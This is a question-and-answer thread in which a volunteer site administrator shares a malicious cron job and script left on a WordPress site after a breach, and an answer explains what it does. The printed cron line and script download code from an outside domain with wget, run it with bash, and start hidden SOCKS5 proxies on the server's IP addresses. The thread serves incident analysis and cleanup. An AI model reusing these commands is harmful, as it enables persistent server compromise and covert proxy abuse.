some malware that appeared on our site related to the recent wordpress attack

Question

Apparently I site I do some volunteer work for was one of a few thousand sites targeted in a recent hack that exploited some vulnerability in wordpress. The result of the breach was a cron job added to the site:

0    */48    *    *    *    cd /tmp;wget clintonandersonperformancehorses.com/test/test;bash test;cd /tmp;rm -rf test

the file it was pulling is this (obviously, don't try to execute this...)

killall -9 perl
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
sh getip >>bug.txt
/sbin/ifconfig  |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
bash mbind clean.txt
bash binded.txt
cd ..
rm -rf stest

I was hoping someone could tell me what it does? I cleaned out the cron job and will follow all the other advice available to secure the site again, but I am worried that some additional damage might have been done that is not as obvious. I just can't figure out what the heck that file was actually doing.

Answer 1

I just can't figure out what the heck that file was actually doing.

Quick Summary

In summary, It kills all perl processes and then starts up SOCKS5 servers on all the machine's external IP addresses.

In Depth

In more detail, let's look at the script line-by-line:

killall -9 perl

This kills all perl processes.

cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest

The above downloads the file stest.tar and untars it in the /tmp/stest directory, deletes the tar file, and moves into the directory which now holds the downloaded files.

sh getip >>bug.txt

The getip script, part of stest.tar, uses icanhazip.com to find your public IP address and stores that in the file bug.txt.

/sbin/ifconfig  |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt

The above uses ifconfig to check for any other non-local IP addresses that your machine answers to and adds them to bug.txt. Duplicates are removed and the final list of your public IP addresses is saved in the file clean.txt.

bash mbind clean.txt

This is the meat of the script. mbind, which was part of stest.tar, runs the script inst on each IP address in clean.txt. For that IP address, inst, also part of stest.tar, selects a port at random and starts a copy of "Simple SOCKS5 Server for Perl" on that IP and that port.

More specifically, the SOCKS server that is run is version 1.4 of Simple Socks Server for Perl which can be downloaded from sourceforge. The version used here differs from the sourceforge in only minor respects: a help message is suppressed, the md5 option is removed, and the IP and port are included in the script, rather than passed on in on the command line. I suspect that the purpose of the latter change is make the script's command line look relatively innocuous when viewed with a utility such as ps.

bash binded.txt

The script binded.txt was created by inst. It apparently runs a check on the SOCKS5 server.

cd ..
rm -rf stest

The last part just does clean-up. It removes all the un-tarred files and the temporary files created by the scripts.

How to determine if one of the SOCKS servers is still running

The script inst (part of the .tar file) starts each SOCKS server with the command:

/usr/bin/perl httpd

To see if one is still running, look through the output of ps wax and see if you see that command. If you do it, use the kill command to stop it.